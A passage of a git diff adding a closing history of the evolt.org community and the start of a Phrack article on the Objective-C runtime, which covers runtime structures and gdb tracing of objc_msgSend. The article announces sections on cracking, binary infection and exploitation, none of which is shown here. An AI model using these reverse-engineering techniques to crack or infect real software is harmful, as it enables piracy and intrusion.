+been purchased by Lycos) did not provide one. When one member, Dan Cody, 
+as a service to fellow list members, published his own archive of the 
+list, Wired's attorneys ordered him to stop, explaining they were 
+reserving their rights to the list posts. Wired further explained that 
+they hoped to post the archives at a later date, and include banner ads. 
+  A number of the community raised a protest, and on December 14, about 
+thirty people from the monkeyjunkies community left Webmonkey to form 
+their own community-run list, and later, website, evolt.org.
+
+Evolt.org was both an emulation of, and a response to, Wired Digital and 
+Webmonkey. Pre-Lycos Webmonkey featured a regular staff of writers and 
+web developers living and working in San Francisco, California, 
+producing articles that were both informative and humorous. Silly 
+analogies and crazy story lines made tech tutorials entertaining and 
+accessible. Advertising was always prominent; in fact, Wired founder 
+Kevin Kelly, has said that Wired "co-invented the banner ad." 
+Monkeyjunkies, the mailing list, almost seemed an afterthought, 
+bolstered no doubt by the magnetic draw of the groundbreaking sites with 
+which it was associated.
+
+Evolt.org began not with a website, nor with an organizational 
+structure, but with thelist, a general web development list, in the vein 
+of monkeyjunkies, but non-corporate, non-commercial, and archived 
+online. Some of the original evolters had internet community experience 
+going back to usenet, and more than anything, it was the idea of 
+creating an online "community" to which they were drawn, and the idea 
+that web developers could assist each other, peer to peer, on a 
+worldwide basis.
+
+In addition to the attention paid to a community-oriented model, 
+evolt.org distinguished themselves from Wired and other corporate web 
+development sites by eschewing advertising. Finally, evolt.org would not 
+claim copyright on anything written by any of its contributors, beyond 
+what is granted by the contributor when he or she publishes on an 
+evolt.org list or site. In the spirit of open source, we were, and are, 
+"a world community for web developers, promoting the mutual free 
+exchange of ideas, skills and experiences."
+
++-+-+-+-+-+-+-+-+-+-+-+-
+1998-2000 : RAPID GROWTH
++-+-+-+-+-+-+-+-+-+-+-+-
+
+Evolt.org members organized themselves entirely through email at first, 
+with direction taking place on the admin list, which was archived, but 
+closed to all but admins.
+
+Our main web development list, thelist, was up and running by early 
+1999, and by June we were also running a content-managed site to which 
+members could submit, rate, and comment on articles posted into several 
+"centers" or web development categories.  Adrian Roselli offered his 
+personal collection of browsers, and thus browsers.evolt.org was born. 
+The admin group maintained systems, managed development, and acted as 
+editors, still with no formalized structure. Some members would gather 
+to code the CMS and other applications at codefests. Later we would 
+gather for purely social purposes as well (aka "beervolts.") Admins 
+worked hard at everything from evangelizing to coding to creating 
+content.  List and site traffic grew rapidly.
+
++-+-+-+-+-+-+-+-+-+-+-+-+-
+2000-2002 : GROWING FLAMES
++-+-+-+-+-+-+-+-+-+-+-+-+-
+
+In early 2000, Webmonkey experienced an exodus of editorial staff, and 
+later that year, monkeyjunkies shut down, with scores of displaced 
+"monkeys" moving to evolt.org's thelist. Things were going great for 
+evolt.org.
+
+We tended to organize ourselves by list. After thelist was 
+well-established, thechat began in 2001 as a place to chat about 
+anything that was neither related to evolt.org or the web development 
+business: "imagine yourself round a table in a pub."  Admins continued 
+to communicate with each other via a closed list. In late 2000 admin 
+began a new list for issues specific to the website. This new list, 
+thesite, was open to all interested evolt.org members.
+
+In early 2001, about a dozen the evolt.org admin group gathered at the 
+SXSW interactive conference in Austin, Texas. The group included members 
+from both US coasts, the midwest, Texas, the UK, and Iceland. It was 
+cozy, with a dozen of us sharing two hotel rooms. And it was at this 
+time that we began to attempt to organize ourselves into something 
+resembling a traditional non-profit organization. We elected a board of 
+directors; Dan Cody was elected chairman.
+
+Shortly thereafter, the admin group broke out into a series of power 
+struggles.
+
+While we had been able to do a certain amount of big-picture planning in 
+Austin, it was difficult to keep track of things once we had spread out 
+again. We were still communicating mostly by email (on- and off- lists), 
+by phone, and occasionally by IRC chat (a challenge, since we were 
+spread over so many timezones worldwide), with rare face-to-face 
+meet-ups as folks were able. However we ran repeatedly into walls, since 
+we all came from different cultures, we weren't all always the best 
+communicators, and our vision wasn't always consistent. Trying to make a 
+motion and vote on it was an often cumbersome (and sometimes divisive) 
+practice.
+
+As 2001 drew to a close, the evolt.org admin community had many 
+challenges to face, not the least of which was "process." How do you 
+govern yourselves when you are unable to sustain a traditional 
+organizational structure, and when can't meet face to face?
+
+In early 2002 the organization learned that Dan was personally 
+supporting evolt.org's site and high-bandwidth browser archive at the 
+rate of $1000 a month. Many were concerned because evolt.org wanted to 
+be able to survive as an organization regardless of whether any one 
+member were available to shoulder his or her portion of the load. Long 
+term survival of the organization became a key concern, known in 
+shorthand as "the bus question." If any one of us were hit by a bus, how 
+would the rest of us make it? Unfortunately, the ongoing discussion 
+around power and leadership issues caused such a rift in the admin group 
+that Dan Cody, our first and last official leader, resigned in May 2002.
+
+Remaining members continued to struggle with organizational and 
+financial issues. By this point, several of those elected in Austin had 
+resigned posts for one reason or another. For the rest, it seemed that 
+the offices held no real meaning in the context of evolt.org.
+
+In search of order, we divided ourselves into committees, and continued 
+attempting to establish voting and other processes. The closed admin 
+list dissolved, and long-term planning moved to newer openly-archived 
+list called "theforum." Seeking order, we hoped to solve some of the 
+boundary and accountability issues that had led to the fracturing of the 
+community. Yet the quest for process and organization itself became 
+frustrating to many, because it often seemed like the majority of our 
+energy was being spent on process and power issues rather than on 
+achievement and moving forward as a group. At the same time, world 
+events from the dot com crash to 9/11 to the 2003 US-led invasion of 
+Iraq fueled emotional responses to exisiting tensions.  Once thriving, 
+thechat erupted in flames, then slowed down considerably.
+
++-+-+-+-+-+-+-+-+-+-+-+-+-+
+2003-2005 : SEEKING BALANCE
++-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+By 2003, evolt.org had over 3,000 members subscribed to thelist. We 
+continued to maintain the browser archive, and a community web resource 
+directory, and for the past year and a half, had been offering all our 
+members free web hosting as well. We still had essentially no budget, 
+though by this point fundraising had become a serious focus.  In 2003 
+evolt.org stopped offering free webhosting, and we finally allowed some 
+google ads to be placed on our browser archive in order to help pay for 
+our hosting costs.
+
+Eventually most of the committees and smaller lists were shut down, and 
+their duties folded back into theforum. We continued publishing 
+articles, and hosting our main lists, but discontinued the directory. 
+Meanwhile, it was becoming increasingly clear that evolt.org's custom 
+Cold Fusion-based CMS was vulnerable to the bus scenario.  By 2004 we 
+were down to one active CMS developer/webhost (lists.evolt.org at the 
+time, was hosted the UK). As always, the heavy amount of responsibility 
+taken on by a single person became a concern to others in the 
+organization.  The group voted to move out of our custom CMS and into an 
+established open-source CMS, Drupal. We found low-cost dedicated hosting 
+at The Planet, and mirrors helped relieve some of the bandwidth pressure 
+on the browser archive. The new Drupal-driven site went live in 2005.
+
+We had finally managed to decentralize evolt.org to the point that it 
+could survive the sudden departure of any one of its caretakers. 
+Ironically, the rocky road to that place resulted in the loss of some 
+high-contributing admins.
+
+As for governing structure, evolt.org ultimately settled on an ad hoc 
+consensus process.  One of us will propose an idea to theforum, ask if 
+there are objections, and wait a few days for responses. If there are no 
+objections, one assumes consensus and moves forward. If there are 
+objections, we try to talk through them, rather than fight.  Also, we 
+are no longer concerned with formalizing a hierarchy.
+
+Those who have lasted through the years have progressed a great deal in 
+their ability to work together. While we still face communication 
+challenges, we are more familiar with the territory now.
+
++-+-+-+-+-+-+-+-+-+
+2006-2008 : INERTIA
++-+-+-+-+-+-+-+-+-+
+
+As evolt.org admin has worked to put our organization in order, web 
+progress has lagged. The patched-together 2005 design was intended to be 
+temporary, but has yet to be replaced. In 2006 there was a failed 
+movement toward redesign, and by 2008 our article submissions and web 
+traffic had dropped noticeably. Activity on thelist remained steady, but 
+at a lower volume than in years past.
+
++-+-+-+-+-+-+-+-+-+-+
+2008 AND : OUR FUTURE
++-+-+-+-+-+-+-+-+-+-+
+
+As we move forward into our tenth year, a few large projects lie before 
+us. We are taking a step back, looking at how we are serving our 
+community, and asking how we can do better. To that end we are surveying 
+our community for input. In addition, we continue to work on improving 
+our browser archive by adding more mirrors, and hopefully also adding 
+more information about some of our unique and interesting browsers. 
+Finally, we are taking steps toward truly internationalizing our site, 
+so that we have the foundation on which to build localized versions of 
+evolt.org, a vision we've had, but kept on the backburner, since 2001.
+
+Though the journey has been far from smooth, we've managed to maintain 
+the integrity of our organization, our community, our purpose, and our 
+archives. We continue to welcome new members who want to contribute 
+their talents and energy to the community, while learning new skills 
+along the way. Like the internet itself, evolt.org is made of 
+"imperfect, unreliable parts, connected together to create the most 
+reliable thing we have."
+
+Here's to a harmonious, productive, and successful next ten years.
+
+--------[ EOF
diff --git a/phrack66/4.txt b/phrack66/4.txt
new file mode 100644
index 0000000..e0ea909
--- /dev/null
+++ b/phrack66/4.txt
@@ -0,0 +1,3587 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0d, Issue 0x42, Phile #0x04 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=-------=[ The Objective-C Runtime:  Understanding and Abusing ]=-------=|
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ nemo@felinemenace.org ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+  1 - Introduction 
+
+  2 - What is Objective-C?
+
+  3 - The Objective-C Runtime
+   3.1 - libobjc.A.dylib
+   3.2 - The __OBJC Segment
+
+  4 - Reverse Engineering Objective-C Applications.
+   4.1 - Static analysis toolset
+   4.2 - Runtime analysis toolset
+   4.3 - Cracking
+   4.4 - Objective-C Binary infection.
+
+  5 - Exploiting Objective-C Applications
+   5.1 - Side note: Updated shared_region technique.
+
+  6 - Conclusion 
+
+  7 - References
+
+  8 - Appendix A: Source code
+
+--[ 1 - Introduction 
+
+Hello reader. I am writing this paper to document some research which I
+undertook on Mac OS X around 3 years ago.
+
+At the time i prepared this research, I gave a talk on it at Ruxcon.
+It was a pretty terrible talk, dry and technical and it demotivated me a
+little. Unfortunately due to this i didn't keep the slides. Around this
+time my laptop broke and Apple refused to fix it. This drove me away from
+Mac OS X for a while. A week ago, we tried again with another Apple store,
+just in case, and they seem to have fixed the problem. So i'm back on OS X
+and giving the documentation of this research another try. I'm hoping it
+transfers a little smoother in .txt format, however you be the judge.
+
+The topic of this research is the Objective-C runtime on Mac OS X.
+Basically, during the contents of this paper, i will look at how the
+Objective-C runtime works both in a binary, and in memory. I will then look
+at how we can manipulate the runtime to our advantage, from a reverse
+engineering/exploit development and binary infection perspective.
+
+--[ 2 - What is Objective-C?
+
+Before we look at the Objective-C runtime, let's take a look at what
+Objective-C actually is.
+
+Objective-C is a reflective programming language which aims to provide object
+orientated concepts and Smalltalk-esque messaging to C.
+
+Gcc provides a compiler for Objective-C, however due to the rich library
+support on OpenStep based operating systems (Mac OS X, IPhone, GNUstep) it
+is typically only really used on these platforms.
+
+Objective-C is implemented as an augmentation to the C language. It is
+a superset of C which means that any Objective-C compiler can also compile
+C.
+
+To learn more about Objective-C, you can read the [1] and [2] in the
+references. 
+
+To illustrate what Objective-C looks like as a language we'll look at a simple 
+Hello World example from [3]. This tutorial shows how to compile a basic
+Hello World style Objective-C app from the command line. If you're already
+familiar with Objective-C just go ahead and skip to the next section. ;-)
+
+So first we make a directory for our project ...
+
+-[dcbz@megatron:~/code]$ mkdir HelloWorld
+-[dcbz@megatron:~/code]$ mkdir HelloWorld/build
+
+... and create the header file for our new class (Talker.)
+
+-[dcbz@megatron:~/code]$ cat > HelloWorld/Talker.h
+#import <Foundation/Foundation.h>
+
+@interface Talker : NSObject
+
+- (void) say: (STR) phrase;
+
+@end
+
+^D
+
+As you can see, Objective-C projects use the .h extension
+just like C. This header looks pretty different to a typically C style
+header though.
+
+The "@interface Talker : NSObject" line basically tells the compiler that
+a "Talker" class exists, and it's derived from the NSObject class.
+
+The "- (void) say: (STR) phrase;" line describes a public method of that
+class called "say". This method takes a (STR) argument called "phrase".
+
+Now that the header file exists and our class is defined, we need to
+implement the meat of the class. Typically Objective-C files have the file
+extension ".m". 
+ 
+-[dcbz@megatron:~/code]$ cat > HelloWorld/Talker.m
+#import "Talker.h"
+
+@implementation Talker
+
+- (void) say: (STR) phrase {
+  printf("%s\n", phrase);
+}
+
+@end
+
+^D
+
+Clearly the implementation for the Talker class is pretty straight
+forward. The say() method takes the string "phrase" and prints it with 
+printf.
+
+Now that our class is layed down, we need to write a little main()
+function to use it.
+
+-[dcbz@megatron:~/code]$ cat > HelloWorld/hello.m
+#import "Talker.h"
+
+int main(void) {
+  Talker *talker = [[Talker alloc] init];
+  [talker say: "Hello, World!"];
+  [talker release];
+}
+
+From this example you can see that the syntax for calling methods of an 
+Objective-C class is not quite the same as your typical C or C++ code.
+It looks far more like smalltalk messaging, or Lisp.
+
+        [<object> <method>: <argument>];
+
+Typically Objective-C programmers alloc and init on the same line, as shown
+in the example.  I know this generally sets off alarm bells that a NULL
+pointer dereference can occur, however the Objective-C runtime has a check
+for a NULL pointer being passed to the runtime which catches this condition. 
+(see the objc_msgSend source later in this paper.)
+
+Now we just build the project. The -framework option to gcc allows us to
+specify an Objective-C framework to link with.
+
+-[dcbz@megatron:~/code]$ cd HelloWorld/
+-[dcbz@megatron:~/code/HelloWorld]$ gcc -o build/hello Talker.m
+hello.m -framework Foundation
+-[dcbz@megatron:~/code/HelloWorld]$ cd build/
+-[dcbz@megatron:~/code/HelloWorld/build]$ ./hello 
+Hello, World!
+
+As you can see, the produced binary outputs "Hello, World!" as expected.
+Unfortunately, this example about showcases all the skill I have with
+Objective-C as a language. I've spent way more time auditing it than I have
+writing it. Fortunately you don't really need a heavy understanding of
+Objective-C to follow the rest of the paper.
+
+--[ 3 - The Objective-C Runtime
+
+Now that we're intimately familiar with Objective-C as a language, ;-) - We
+can begin to focus on the interesting aspects of Objective-C, the runtime
+that allows it to function.
+
+As I mentioned earlier in the Introduction section, Objective-C is a
+reflective language. The following quote explains this more clearly than i
+could (in a very academic manner :( ).
+
+"""
+ Reflection is the ability of a program to manipulate as data something
+representing the state of the program during its own execution. There are
+two aspects of such manipulation :  introspection and  intercession.
+Introspection is the ability of a program to observe and therefore reason
+about its own state. Intercession is the ability of a program to modify its
+own execution state or alter its own interpretation or meaning. Both
+aspects require a mechanism for encoding execution state as data; providing
+such an encoding is called  reification.
+""" - [4]
+
+Basically this means, that at runtime, Objective-C classes are designed to
+be aware of their own state, and be capable of altering their own
+implementation. As you can imagine, this information/functionality can be
+quite useful from a hacking perspective.
+
+So how is this implemented on Mac OS X? Firstly, when gcc compiles our 
+hello.m application, it is linked with  the "libobjc.A.dylib" library.
+
+"""
+-[dcbz@megatron:~/code/HelloWorld/build]$ otool -L hello 
+hello:
+	/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
+(compatibility version 300.0.0, current version 677.22.0)
+	/usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0, current
+version 1.0.0)
+	/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current
+version 111.1.3)
+	/usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current
+version 227.0.0)
+	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
+(compatibility version 150.0.0, current version 476.17.0)
+"""
+
+The source code for this dylib is available from [5]. This library contains
+the code for manipulating our Objective-C classes at runtime. 
+
+Also during compile time, gcc is responsible for storing all the
+information required by libobjc.A.dylib inside the binary. This is
+accomplished by creating the __OBJC segment. I plan not to cover the Mach-O
+file format in this paper, as it's been done to death [6]. We're more
+interested in what the various sections contain.
+
+Here's a list of the __OBJC segment in our binary and the sections
+contained (logically) within.
+
+	LC_SEGMENT.__OBJC.__cat_cls_meth 
+	LC_SEGMENT.__OBJC.__cat_inst_meth 
+	LC_SEGMENT.__OBJC.__string_object 
+	LC_SEGMENT.__OBJC.__cstring_object 
+	LC_SEGMENT.__OBJC.__message_refs 
+	LC_SEGMENT.__OBJC.__sel_fixup 
+	LC_SEGMENT.__OBJC.__cls_refs 
+	LC_SEGMENT.__OBJC.__class 
+	LC_SEGMENT.__OBJC.__meta_class
+	LC_SEGMENT.__OBJC.__cls_meth 
+	LC_SEGMENT.__OBJC.__inst_meth
+	LC_SEGMENT.__OBJC.__protocol
+	LC_SEGMENT.__OBJC.__category 
+	LC_SEGMENT.__OBJC.__class_vars 
+	LC_SEGMENT.__OBJC.__instance_vars 
+	LC_SEGMENT.__OBJC.__module_info 
+	LC_SEGMENT.__OBJC.__symbols 
+
+As you can see, quite a lot of information is stored in the file and
+therefore available at runtime..
+
+We'll look at both the in memory components of the Objective-C runtime and
+the file contents in more detail in the following sections.
+
+------[ 3.1 - libobjc.A.dylib
+
+As mentioned previously, the file libobjc.A.dylib is a library file on Mac
+OS X which provides the in-memory runtime functionality of the Objective-C
+language.
+
+The source code for this library is available from the apple website. [5].
+
+Apple have documented the mechanics of this library quite well in the
+papers [7] & [8]. These papers show versions 1.0 and 2.0 of the runtime. 
+
+When I last looked at the runtime 3 years ago, version 2.0 was the latest.
+However it seems that 3.0 is the standard now, and things have changed
+quite dramatically. I actually wrote a large portion of this section based
+on how things used to be, and I had to go back and rewrite most of it.
+Hopefully there aren't any errors due to this. But please forgive me if
+there are.
+
+Probably the first and most important function in this library is the 
+"objc_msgSend" function. 
+
+objc_msgSend() is used to send messages to an object in memory.  All access
+to a method or attribute of an Objective-C object at runtime utilize this
+function.
+
+Here is the description of this function, taken from the Objective-C 2.0
+Runtime Reference [7].
+
+"""
+objc_msgSend(): 
+
+Sends a message with a simple return value to an instance of a class. 
+
+	id objc_msgSend(id theReceiver, SEL theSelector, ...) 
+
+Parameters:
+
+        theReceiver 
+
+                A pointer that points to the instance of the class that is
+                to receive the message. 
+
+        theSelector 
+
+               The selector of the method that handles the message. 
+
+        ... 
+
+               A variable argument list containing the arguments to 
+               the method. 
+
+        ReturnValue 
+               The return value of the method. 
+"""
+
+In order to understand this function we need to first understand the
+structures used by this function.
+
+The first argument to objc_msgSend() is an "id" struct. The definition for
+this struct is in the file /usr/include/objc/objc.h.
+
+	typedef struct objc_object { 
+	    Class isa; 
+	} *id; 
+
+	typedef struct objc_class *Class; 
+
+	struct objc_class
+	{
+	   struct objc_class* isa;
+	   struct objc_class* super_class;
+	   const char* name;
+	   long version;
+	   long info;
+	   long instance_size;
+	   struct objc_ivar_list* ivars;
+	   struct objc_method_list** methodLists;
+	   struct objc_cache* cache;
+	   struct objc_protocol_list* protocols;
+	};
+
+As you can see, an id is basically a pointer to an "objc_class" instance in
+memory. 
+
+I will now run through some of the more interesting elements of this
+struct.
+
+The isa element is a pointer to the class definition for the object.
+
+The super_class element is a pointer to the base class for this object.
+
+The name element is just a pointer to the name of the object at runtime. 
+This is only really useful from a higher level perspective.
+
+The ivars element is basically a way to represent all the instance
+variables of an object in memory. It consists of a pointer to an 
+objc_ivar_list struct. This basically contains a count, followed by an 
+array of count * objc_ivar structs.
+
+	struct objc_ivar_list {
+	    int ivar_count
+	    /* variable length structure */
+	    struct objc_ivar ivar_list[1]
+	}                          
+
+The objc_ivar struct, consists of the name, and type of the variable.
+Both of which are simply char * as seen below.
+
+	struct objc_ivar {
+	    char *ivar_name
+	    char *ivar_type
+	    int ivar_offset
+	}                        
+
+The ivar_offset value indicates how far into the __OBJC.__class_vars
+section to seek, to find the data used by this variable.
+
+The methodLists element is basically a list of the methods supported by 
+the class. The objc_method_list struct is simply made up of an integer 
+that dictates how many methods there are, followed by an array of struct
+objc_method's.
+
+	struct objc_method_list 
+	{ 
+	    struct objc_method_list *obsolete; 
+	    int method_count; 
+	    struct objc_method method_list[1]; 
+	} 
+
+	typedef struct objc_method *Method;
+
+The objc_method struct contains a SEL, (our second argument to objc_msgSend
+too, while we'll get to soon) which dictates the method_name, a string
+containing the argument types to the method. Finally this struct contains a
+function pointer for the method itself, of type IMP.
+
+	struct objc_method {
+	    SEL method_name
+	    char *method_types
+	    IMP method_imp
+	}
+
+	id (*IMP)(id, SEL, ...) 
+
+An IMP function pointer indicates that the first argument should be the
+classes "self" pointer, or the id (objc_class) pointer for the class.
+The second argument should be the methods's SEL (selector).
+
+For now that's all that's interesting to us about the ID data type. Later
+on in this paper we'll look at how the method caching works, and how it can
+negatively affect us.
+
+Now let's look at the mysterious data type "SEL" that we've been
+hearing so much about. The second argument to objc_msgSend.
+
+	typedef struct objc_selector    *SEL;
+
+And what is an objc_selector struct you ask? Turns out, it's just a char *
+string that's been processed by the runtime.
+
+objc_msgSend() is implemented in assembly. To read it's implementation
+browse to the runtime/Messengers.subproj directory in the objc-runtime
+source tree. The file objc-msg-i386.s is the intel implementation of
+this.
+
+Now that we're some what familiar with the runtime, let's take a look at
+our sample "hello" application we wrote earlier in a debugger and verify
+our progress.
+
+The most commonly used debugger on Mac OS X is gdb, obviously. Since I've
+spent so much time in the Windows world lately I am intel syntax inclined, 
+I apologize in advance. 
+
+Regardless, let's fire up gdb and take a look at the source of our main 
+function.
+
+-[dcbz@megatron:~/code/HelloWorld/build]$ gdb ./hello 
+GNU gdb 6.3.50-20050815 (Apple version gdb-768) (Tue Oct  2 04:07:49 UTC
+2007)
+Copyright 2004 Free Software Foundation, Inc.
+(gdb) set disassembly-flavor intel
+(gdb) disas main
+Dump of assembler code for function main:
+0x00001f3d <main+0>:	push   ebp
+0x00001f3e <main+1>:	mov    ebp,esp
+0x00001f40 <main+3>:	push   ebx
+0x00001f41 <main+4>:	sub    esp,0x24
+0x00001f44 <main+7>:	call   0x1f49 <main+12>
+0x00001f49 <main+12>:	pop    ebx
+0x00001f4a <main+13>:	lea    eax,[ebx+0x117b]
+0x00001f50 <main+19>:	mov    eax,DWORD PTR [eax]
+0x00001f52 <main+21>:	mov    edx,eax
+0x00001f54 <main+23>:	lea    eax,[ebx+0x1177]
+0x00001f5a <main+29>:	mov    eax,DWORD PTR [eax]
+0x00001f5c <main+31>:	mov    DWORD PTR [esp+0x4],eax
+0x00001f60 <main+35>:	mov    DWORD PTR [esp],edx
+0x00001f63 <main+38>:	call   0x4005 <dyld_stub_objc_msgSend>
+0x00001f68 <main+43>:	mov    edx,eax
+0x00001f6a <main+45>:	lea    eax,[ebx+0x1173]
+0x00001f70 <main+51>:	mov    eax,DWORD PTR [eax]
+0x00001f72 <main+53>:	mov    DWORD PTR [esp+0x4],eax
+0x00001f76 <main+57>:	mov    DWORD PTR [esp],edx
+0x00001f79 <main+60>:	call   0x4005 <dyld_stub_objc_msgSend>
+0x00001f7e <main+65>:	mov    DWORD PTR [ebp-0xc],eax
+0x00001f81 <main+68>:	mov    ecx,DWORD PTR [ebp-0xc]
+0x00001f84 <main+71>:	lea    eax,[ebx+0x116f]
+0x00001f8a <main+77>:	mov    edx,DWORD PTR [eax]
+0x00001f8c <main+79>:	lea    eax,[ebx+0x96]
+0x00001f92 <main+85>:	mov    DWORD PTR [esp+0x8],eax
+0x00001f96 <main+89>:	mov    DWORD PTR [esp+0x4],edx
+0x00001f9a <main+93>:	mov    DWORD PTR [esp],ecx
+0x00001f9d <main+96>:	call   0x4005 <dyld_stub_objc_msgSend>
+0x00001fa2 <main+101>:	mov    edx,DWORD PTR [ebp-0xc]
+0x00001fa5 <main+104>:	lea    eax,[ebx+0x116b]
+0x00001fab <main+110>:	mov    eax,DWORD PTR [eax]
+0x00001fad <main+112>:	mov    DWORD PTR [esp+0x4],eax
+0x00001fb1 <main+116>:	mov    DWORD PTR [esp],edx
+0x00001fb4 <main+119>:	call   0x4005 <dyld_stub_objc_msgSend>
+0x00001fb9 <main+124>:	add    esp,0x24
+0x00001fbc <main+127>:	pop    ebx
+0x00001fbd <main+128>:	leave  
+0x00001fbe <main+129>:	ret    
+
+As you can see, our main function only consists of 4 calls to
+objc_msgSend(). There are no calls to our actual methods here. 
+Here is a listing of the source code again, to jog your memory.
+
+	int main(void) {
+	  Talker *talker = [[Talker alloc] init];
+	  [talker say: "Hello World!"];
+	  [talker release];
+	}
+
+Each call to objc_msgSend() corresponds to each method call
+in our source.
+           class | method 
+         ------------------         
+          Talker | alloc
+          talker | init 
+          talker | say
+          talker | release
+         ------------------
+
+To verify this we can put a breakpoint on the objc_msgSend() function.
+
+(gdb) break objc_msgSend
+Breakpoint 2 at 0x9470d670
+(gdb) c
+Continuing.
+
+Breakpoint 2, 0x9470d670 in objc_msgSend ()
+(gdb) x/2i $pc
+0x9470d670 <objc_msgSend>:      mov    ecx,DWORD PTR [esp+0x8]
+0x9470d674 <objc_msgSend+4>:    mov    eax,DWORD PTR [esp+0x4]
+
+As you can see, the first two instructions in objc_msgSend() are
+responsible for moving the id into eax, and the selector into ecx.
+
+To verify, lets step and print the contents of ecx.
+
+(gdb) stepi
+0x9470d674 in objc_msgSend ()
+(gdb) x/s $ecx
+0x9470e66c <objc_msgSend_stub+828>:      "alloc"
+
+As predicted "alloc" was the first method called.
+
+Now we can delete our breakpoints, and add a breakpoint at the current
+location. Then use the "commands" option in gdb to print the string at ecx,
+every time this breakpoint is hit.
+
+(gdb) break
+Breakpoint 3 at 0x9470d674
+(gdb) commands
+Type commands for when breakpoint 3 is hit, one per line.
+End with a line saying just "end".
+>x/s $ecx
+>c
+>end
+(gdb) c
+Continuing.
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x94722d20 <__FUNCTION__.12370+80320>:   "defaultCenter"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x9470e83c <objc_msgSend_stub+1292>:     "self"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x94772d28 <__FUNCTION__.12370+408008>:
+"addObserver:selector:name:object:"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x9470e66c <objc_msgSend_stub+828>:      "alloc"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x9470e680 <objc_msgSend_stub+848>:      "initialize"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x9477f158 <__FUNCTION__.12370+458232>:  "allocWithZone:"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x9470e858 <objc_msgSend_stub+1320>:     "init"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x1fd0 <main+147>:       "say:"
+Hello World!
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x947a9334 <__FUNCTION__.12370+630740>:  "release"
+
+Breakpoint 8, 0x9470d674 in objc_msgSend ()
+0x9474e514 <__FUNCTION__.12370+258484>:  "dealloc"
+
+This works as expected. However, we can see that we were flooded with
+methods that weren't related to our class from the NS runtime loading.
+Let's try to implement something to see which class methods were called on.
+
+Remembering back to our objc_class struct:
+
+        struct objc_class
+        { 
+           struct objc_class* isa;
+           struct objc_class* super_class;
+           const char* name;
+
+8 bytes into the struct there's a 4 byte pointer to the class's name.
+
+To verify this, we can restart the process with our breakpoint in the same
+place.
+
+Breakpoint 6, 0x9470d674 in objc_msgSend ()
+(gdb) printf "%s\n", *(long*)($eax+8)
+NSNotificationCenter
+
+This time when it's hit, we deref the pointer at $eax+8 and print it to
+find out the class name.
+
+Again we can script this with the "commands" option to automate the process.
+But lets change our code so that rather than using printf, we utilize one
+of the functions exported by our objective-c runtime:
+
+call (char *)class_getName($eax)
+
+This function will do the work for us just with our ID.
+
+(gdb) b *0x9470d674
+Breakpoint 1 at 0x9470d674
+(gdb) commands
+Type commands for when breakpoint 1 is hit, one per line.
+End with a line saying just "end".
+>call (char *)class_getName($eax)
+>x/s $ecx
+>c
+>end
+(gdb) run
+...
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$107 = 0x6e6f5a68 <Address 0x6e6f5a68 out of bounds>
+0x9477f158 <__FUNCTION__.12370+458232>:  "allocWithZone:"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$108 = 0x0
+0x94772d28 <__FUNCTION__.12370+408008>:
+"addObserver:selector:name:object:"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$109 = 0x916e0318 "NSNotificationCenter"
+0x94722d20 <__FUNCTION__.12370+80320>:   "defaultCenter"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$110 = 0x916e0318 "NSNotificationCenter"
+0x9470e83c <objc_msgSend_stub+1292>:     "self"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$111 = 0x0
+0x94772d28 <__FUNCTION__.12370+408008>:
+"addObserver:selector:name:object:"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$112 = 0x77656e <Address 0x77656e out of bounds>
+0x9470e66c <objc_msgSend_stub+828>:      "alloc"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$113 = 0x1fc9 "Talker"
+0x9470e680 <objc_msgSend_stub+848>:      "initialize"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$114 = 0x1fc9 "Talker"
+0x9477f158 <__FUNCTION__.12370+458232>:  "allocWithZone:"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$115 = 0x6b617761 <Address 0x6b617761 out of bounds>
+0x9470e858 <objc_msgSend_stub+1320>:     "init"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$116 = 0x21646c72 <Address 0x21646c72 out of bounds>
+0x1fd0 <main+147>:       "say:"
+Hello World!
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$117 = 0x6470755f <Address 0x6470755f out of bounds>
+0x947a9334 <__FUNCTION__.12370+630740>:  "release"
+
+Breakpoint 2, 0x9470d674 in objc_msgSend ()
+$118 = 0x615f4943 <Address 0x615f4943 out of bounds>
+0x9474e514 <__FUNCTION__.12370+258484>:  "dealloc"
+
+
+And as you can see, this works as sort of a make shift, objective-c message
+tracing system.  
+
+However in some cases, eax does not actually contain an id. And this will
+not work. Hence we get the messages like:
+
+$118 = 0x615f4943 <Address 0x615f4943 out of bounds>
+
+This is due to the fact that objc_msgSend() is not always an entry point.
+So we can't guarantee that every time our breakpoint is hit we are actually
+seeing a call to objc_msgSend().
+
+To make our tracer work more effectively we can put a breakpoint on
+0x4005 <dyld_stub_objc_msgSend> instead. This means we have to use esp+0x8
+for our SEL and esp+0x4 for our ID.
+
+We can use the statement:
+
+printf "[%s %s]\n", *(long *)((*(long*)($esp+4))+8),*(long *)($esp+8)
+
+To print our object and method nicely. 
+
